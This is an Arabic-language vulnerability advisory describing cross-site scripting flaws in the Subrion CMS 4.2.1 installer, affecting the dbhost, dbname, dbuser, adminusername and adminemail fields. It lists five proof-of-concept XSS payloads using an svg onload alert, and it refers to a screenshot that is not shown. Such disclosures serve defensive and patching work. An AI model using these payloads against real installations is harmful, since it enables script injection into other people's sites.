
يتأثر نظام Subrion CMS 4.2.1 بثغرة البرمجة النصية عبر المواقع (XSS)، والتي تتيح للمهاجمين تنفيذ كود تعسفي عبر حمولة مُصمَّمة خصيصًا في عملية التثبيت.
الوصف: تسمح ثغرات متعددة من نوع البرمجة النصية عبر المواقع (XSS) في تثبيت Subrion CMS الإصدار 4.2.1 لمهاجم محلي بتنفيذ نصوص برمجية ويب عشوائية عبر حمولة مصمّمة بعناية يتم حقنها في dbhost وdbname وdbuser وadminusername وadminemail.
نواقل الهجوم: تسمح ثغرة في تعقيم التثبيت في dbhost وdbname وdbuser وadminusername وadminemail بحقن كود JavaScript.
أثناء عملية التثبيت، نقوم بإدخال حمولة XSS في أي حقل من الحقول الخمسة، وعند الضغط على "التالي" سنحصل على النافذة المنبثقة الخاصة بـ XSS.
'"><svg/onload=alert('dbhost')>
'"><svg/onload=alert('dbname')>
'"><svg/onload=alert('dbuser')>
'"><svg/onload=alert('adminusername')>
'"><svg/onload=alert('adminemail')>

في الصورة التالية يمكنك رؤية الكود المضمّن الذي ينفّذ الحمولة في عملية التثبيت.




